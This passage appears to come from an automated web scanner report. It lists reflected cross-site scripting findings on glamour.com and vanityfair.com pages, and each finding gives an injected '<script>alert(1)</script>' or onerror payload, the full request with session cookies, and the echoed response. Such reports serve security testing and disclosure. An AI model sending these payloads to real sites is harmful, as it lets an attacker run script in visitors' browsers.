HTTP/1.1 404 Not Found Server: Resin/3.1.6 Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:32:52 GMT Date: Mon, 29 Nov 2010 17:22:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 49647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1 ...[SNIP]... <span>women-of-the-yearcdc9d<img src=a onerror=alert(1)>e4fdf758ccb</span> ...[SNIP]...
1.119. http://www.glamour.com/women-of-the-year/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.glamour.com
Path:
/women-of-the-year/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d5b9"><script>alert(1)</script>7809d4f0ec7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /women-of-the-year/?5d5b9"><script>alert(1)</script>7809d4f0ec7=1 HTTP/1.1 Host: www.glamour.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mobify=0;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=600 Expires: Mon, 29 Nov 2010 17:32:38 GMT Date: Mon, 29 Nov 2010 17:22:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 126478
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1 ...[SNIP]... <a href="/women-of-the-year/?5d5b9"><script>alert(1)</script>7809d4f0ec7=1&printable=true" title="Print this page"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c740f<img%20src%3da%20onerror%3dalert(1)>d581caebf96 was submitted in the REST URL parameter 1. This input was echoed as c740f<img src=a onerror=alert(1)>d581caebf96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /women-of-the-yearc740f<img%20src%3da%20onerror%3dalert(1)>d581caebf96/2010/dr-hawa-abdi-and-her-daughters HTTP/1.1 Host: www.glamour.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mobify=0;
Response
HTTP/1.1 404 Not Found Server: Resin/3.1.6 Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:32:55 GMT Date: Mon, 29 Nov 2010 17:22:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 49744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1 ...[SNIP]... <span>women-of-the-yearc740f<img src=a onerror=alert(1)>d581caebf96</span> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d029'%3bf665d01a035 was submitted in the REST URL parameter 1. This input was echoed as 3d029';f665d01a035 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /women-of-the-year3d029'%3bf665d01a035/2010/dr-hawa-abdi-and-her-daughters HTTP/1.1 Host: www.glamour.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mobify=0;
Response
HTTP/1.1 404 Not Found Server: Resin/3.1.6 Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:32:52 GMT Date: Mon, 29 Nov 2010 17:22:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 49584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1 ...[SNIP]... <!--
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62801"><script>alert(1)</script>ea559ef5564 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /women-of-the-year/2010/dr-hawa-abdi-and-her-daughters?62801"><script>alert(1)</script>ea559ef5564=1 HTTP/1.1 Host: www.glamour.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mobify=0;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=600 Expires: Mon, 29 Nov 2010 17:32:41 GMT Date: Mon, 29 Nov 2010 17:22:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 137305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1 ...[SNIP]... <a href="/women-of-the-year/2010/dr-hawa-abdi-and-her-daughters?62801"><script>alert(1)</script>ea559ef5564=1&printable=true" title="Print this page"> ...[SNIP]...
1.123. http://www.vanityfair.com/archive/glee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/archive/glee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e2f"><script>alert(1)</script>2547fbaf1ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /archive/glee?b1e2f"><script>alert(1)</script>2547fbaf1ca=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:38 GMT Date: Mon, 29 Nov 2010 16:49:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 135621
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/archive/glee?printable=true&b1e2f"><script>alert(1)</script>2547fbaf1ca=1" title="Print this page"> ...[SNIP]...
1.124. http://www.vanityfair.com/archive/harry-potter [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/archive/harry-potter
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18fa7"><script>alert(1)</script>6311859b86d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /archive/harry-potter?18fa7"><script>alert(1)</script>6311859b86d=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:34 GMT Date: Mon, 29 Nov 2010 16:49:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 132392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/archive/harry-potter?printable=true&18fa7"><script>alert(1)</script>6311859b86d=1" title="Print this page"> ...[SNIP]...
1.125. http://www.vanityfair.com/archive/prince-william [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/archive/prince-william
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c419f"><script>alert(1)</script>354a99042a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /archive/prince-william?c419f"><script>alert(1)</script>354a99042a1=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:37 GMT Date: Mon, 29 Nov 2010 16:49:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 132563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/archive/prince-william?printable=true&c419f"><script>alert(1)</script>354a99042a1=1" title="Print this page"> ...[SNIP]...
1.126. http://www.vanityfair.com/archive/writers-reading [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/archive/writers-reading
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ac09"><script>alert(1)</script>8c447f10858 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /archive/writers-reading?7ac09"><script>alert(1)</script>8c447f10858=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:30 GMT Date: Mon, 29 Nov 2010 16:49:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 129774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/archive/writers-reading?printable=true&7ac09"><script>alert(1)</script>8c447f10858=1" title="Print this page"> ...[SNIP]...
1.127. http://www.vanityfair.com/business/features/2010/10/greeks-bearing-bonds-201010 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 138f8"><script>alert(1)</script>b7693c314b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /business/features/2010/10/greeks-bearing-bonds-201010?138f8"><script>alert(1)</script>b7693c314b0=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:29 GMT Date: Mon, 29 Nov 2010 16:47:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 108121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/business/features/2010/10/greeks-bearing-bonds-201010?printable=true&138f8"><script>alert(1)</script>b7693c314b0=1" title="Print this page"> ...[SNIP]...
1.128. http://www.vanityfair.com/business/features/2010/10/greeks-bearing-bonds-response-201010 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51a50"><script>alert(1)</script>ec8baaf9988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /business/features/2010/10/greeks-bearing-bonds-response-201010?51a50"><script>alert(1)</script>ec8baaf9988=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:32 GMT Date: Mon, 29 Nov 2010 16:47:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/business/features/2010/10/greeks-bearing-bonds-response-201010?printable=true&51a50"><script>alert(1)</script>ec8baaf9988=1" title="Print this page"> ...[SNIP]...
1.129. http://www.vanityfair.com/business/features/2010/12/jean-pigozzi-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/business/features/2010/12/jean-pigozzi-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdd44"><script>alert(1)</script>dd3d18f3c78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /business/features/2010/12/jean-pigozzi-201012?cdd44"><script>alert(1)</script>dd3d18f3c78=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:52:30 GMT Date: Mon, 29 Nov 2010 16:47:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/business/features/2010/12/jean-pigozzi-201012?printable=true&cdd44"><script>alert(1)</script>dd3d18f3c78=1" title="Print this page"> ...[SNIP]...
1.130. http://www.vanityfair.com/contributors/bramble-trionfo [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/contributors/bramble-trionfo
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b22"><script>alert(1)</script>8729d0e8bc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contributors/bramble-trionfo?d0b22"><script>alert(1)</script>8729d0e8bc6=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:55:07 GMT Date: Mon, 29 Nov 2010 16:50:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 108377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/contributors/bramble-trionfo?printable=true&d0b22"><script>alert(1)</script>8729d0e8bc6=1" title="Print this page"> ...[SNIP]...
1.131. http://www.vanityfair.com/contributors/james-wolcott [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/contributors/james-wolcott
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dad8"><script>alert(1)</script>7babe1fbb73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contributors/james-wolcott?1dad8"><script>alert(1)</script>7babe1fbb73=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=299 Expires: Mon, 29 Nov 2010 16:55:11 GMT Date: Mon, 29 Nov 2010 16:50:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 117736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/contributors/james-wolcott?printable=true&1dad8"><script>alert(1)</script>7babe1fbb73=1" title="Print this page"> ...[SNIP]...
1.132. http://www.vanityfair.com/contributors/juli-weiner [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/contributors/juli-weiner
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a1f"><script>alert(1)</script>b08ee1a73b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contributors/juli-weiner?e5a1f"><script>alert(1)</script>b08ee1a73b3=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:55:09 GMT Date: Mon, 29 Nov 2010 16:50:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 135991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/contributors/juli-weiner?printable=true&e5a1f"><script>alert(1)</script>b08ee1a73b3=1" title="Print this page"> ...[SNIP]...
1.133. http://www.vanityfair.com/contributors/marnie-hanel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/contributors/marnie-hanel
Issue detail
